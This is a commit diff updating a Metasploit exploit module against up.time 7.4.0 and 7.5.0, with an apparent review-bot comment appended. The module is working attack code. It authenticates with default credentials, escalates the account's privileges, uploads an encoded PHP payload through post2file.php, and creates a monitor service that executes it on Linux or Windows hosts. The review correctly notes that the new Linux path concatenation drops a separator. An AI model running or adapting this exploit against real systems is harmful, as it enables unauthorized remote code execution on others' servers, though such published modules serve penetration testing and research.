Update uptime_code_exec.rb
parent
944f47b064
commit
5539363218
|
@ -10,44 +10,45 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Uptime Version 7.4.0 / 7.5.0 Upload and Exec file',
|
||||
'Description' => '
|
||||
This module exploits a vulnerability found in Uptime
|
||||
version 7.4.0 and 7.5.0 By supplying a specially
|
||||
crafted request is possible to upload file and execute
|
||||
arbitrary commands through privilege escalation.
|
||||
',
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
|
||||
'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>'
|
||||
],
|
||||
'References' => [
|
||||
['URL', 'https://www.exploit-db.com/exploits/37888/']
|
||||
],
|
||||
'Payload' => {
|
||||
'Space' => 100_000,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [
|
||||
['Automatic', {}]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'SSL' => false
|
||||
},
|
||||
'Privileged' => 'True',
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 6 2015'
|
||||
))
|
||||
'Name' => 'Uptime Version 7.4.0 / 7.5.0 Upload and Exec file',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Uptime
|
||||
version 7.4.0 and 7.5.0 By supplying a specially
|
||||
crafted request is possible to upload file and execute
|
||||
arbitrary commands through privilege escalation.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
|
||||
'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>'
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['EDB', '37888']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 100_000,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [['Automatic', {}]],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => false
|
||||
},
|
||||
'Privileged' => 'True',
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 6 2015'))
|
||||
|
||||
register_options([
|
||||
Opt::RPORT(9999),
|
||||
OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']),
|
||||
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample'])
|
||||
|
||||
], self.class)
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9999),
|
||||
OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']),
|
||||
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample'])
|
||||
], self.class)
|
||||
end
|
||||
# Application Check
|
||||
def check
|
||||
|
@ -57,7 +58,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
)
|
||||
vprint_status("#{peer} - Checking version...")
|
||||
|
||||
if !res.nil? && res.code == 200 && (res.body.include?('up.time 7.5.0') || res.body.include?('up.time 7.4.0'))
|
||||
if res && res.code == 200 && (res.body.include?('up.time 7.5.0') || res.body.include?('up.time 7.4.0'))
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
|
@ -76,21 +77,23 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
# #Check OS #
|
||||
phpfile_name = rand_text_alpha(10)
|
||||
if !res_auth.nil? && res_auth.headers['Server'] =~ /Unix/
|
||||
if res_auth && res_auth.headers['Server'] =~ /Unix/
|
||||
vprint_status('Found Linux installation - Setting appropriated PATH')
|
||||
phppath = '/usr/local/uptime/apache/bin/php'
|
||||
uploadpath = '/usr/local/uptime/GUI/wizards'
|
||||
cmdargs = uploadpath + '/' + phpfile_name + '.txt'
|
||||
## cmdargs = uploadpath + '/' + phpfile_name + '.txt'
|
||||
cmdargs = "#{uploadpath}#{phpfile_name}.txt"
|
||||
cmd = phppath
|
||||
else
|
||||
vprint_status('Found Windows installation - Setting appropriated PATH')
|
||||
phppath = 'C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe'
|
||||
uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards'
|
||||
uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards\\'
|
||||
cmd = 'c:\\windows\\system32\\cmd.exe'
|
||||
cmdargs = '/K "' + '"' + phppath + '" ' + '"' + uploadpath + '\\' + phpfile_name + '.txt' + '"' + '"'
|
||||
## cmdargs = '/K "' + '"' + phppath + '" ' + '"' + uploadpath + '\\' + phpfile_name + '.txt' + '"' + '"'
|
||||
cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\""
|
||||
end
|
||||
|
||||
if !res_auth.nil? && res_auth.get_cookies =~ /login=true/
|
||||
if res_auth && res_auth.get_cookies =~ /login=true/
|
||||
cookie = Regexp.last_match(1)
|
||||
cookie_split = res_auth.get_cookies.split(';')
|
||||
vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
|
||||
|
@ -119,7 +122,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'subsection' => 'edit',
|
||||
'id' => "#{get_id}"
|
||||
},
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'vars_post' => {
|
||||
'operation' => 'submit',
|
||||
'disableEditOfUsernameRoleGroup' => 'false',
|
||||
|
@ -152,7 +155,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
res_priv = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php?loggedout'),
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
|
||||
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
|
||||
)
|
||||
|
||||
res_auth = send_request_cgi(
|
||||
|
@ -163,7 +166,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'password' => datastore['PASSWORD']
|
||||
}
|
||||
)
|
||||
if !res_auth.nil? && res_auth.get_cookies =~ /login=true/
|
||||
if res_auth && res_auth.get_cookies =~ /login=true/
|
||||
cookie = Regexp.last_match(1)
|
||||
cookie_split = res_auth.get_cookies.split(';')
|
||||
vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
|
||||
|
@ -177,10 +180,10 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
res_service = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'main.php'),
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'vars_get' => {
|
||||
'section' => 'ERDCInstance',
|
||||
'subsection' => 'add'
|
||||
'subsection' => 'add',
|
||||
},
|
||||
'vars_post' => {
|
||||
'initialERDCId' => '20',
|
||||
|
@ -261,7 +264,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# CREATING Linux EXEC Service
|
||||
if !res_auth.nil? && res_auth.headers['Server'] =~ /Unix/
|
||||
if res_auth && res_auth.headers['Server'] =~ /Unix/
|
||||
vprint_status('Creating Linux Monitor Code exec...')
|
||||
create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
|
||||
|
||||
|
@ -277,7 +280,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'wizards', 'post2file.php'),
|
||||
'vars_post' => {
|
||||
'file_name' => phpfile_name + '.txt',
|
||||
## 'file_name' => phpfile_name + '.txt',
|
||||
'file_name' => "#{phpfile_name}.txt",
|
||||
'script' => payload.encoded
|
||||
}
|
||||
)
|
||||
|
@ -288,7 +292,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'uri' => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt")
|
||||
)
|
||||
|
||||
if !res_up_check.nil? && res_up_check.code == 200
|
||||
if res_up_check && res_up_check.code == 200
|
||||
print_good("File found: #{phpfile_name}")
|
||||
else
|
||||
print_error('File not found')
|
||||
|
|
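Review bot: The new Linux `cmdargs = "#{uploadpath}#{phpfile_name}.txt"` line in the `@ -76,21 +77,23 @@` hunk drops the `/` separator that the removed concatenation had, while the Linux `uploadpath = '/usr/local/uptime/GUI/wizards'` is unchanged context with no trailing slash, so the resulting path is `/usr/local/uptime/GUI/wizards<name>.txt` and the uploaded file will not be found; the Windows branch was adjusted by giving its `uploadpath` a trailing backslash, but the Linux branch was not. Either write `cmdargs = "#{uploadpath}/#{phpfile_name}.txt"` or add a trailing `/` to the Linux `uploadpath` to mirror the Windows change, keeping in mind that `uploadpath` is also passed to `create_exec_service`, whose handling of a trailing separator is outside this hunk and should be checked. The `## cmdargs = ...` lines in this hunk and the `## 'file_name' => ...` line in the `@ -277,7 +280,8 @@` hunk are the replaced code kept as comments; they should be deleted rather than left in. The enclosing method starts and ends outside these hunks.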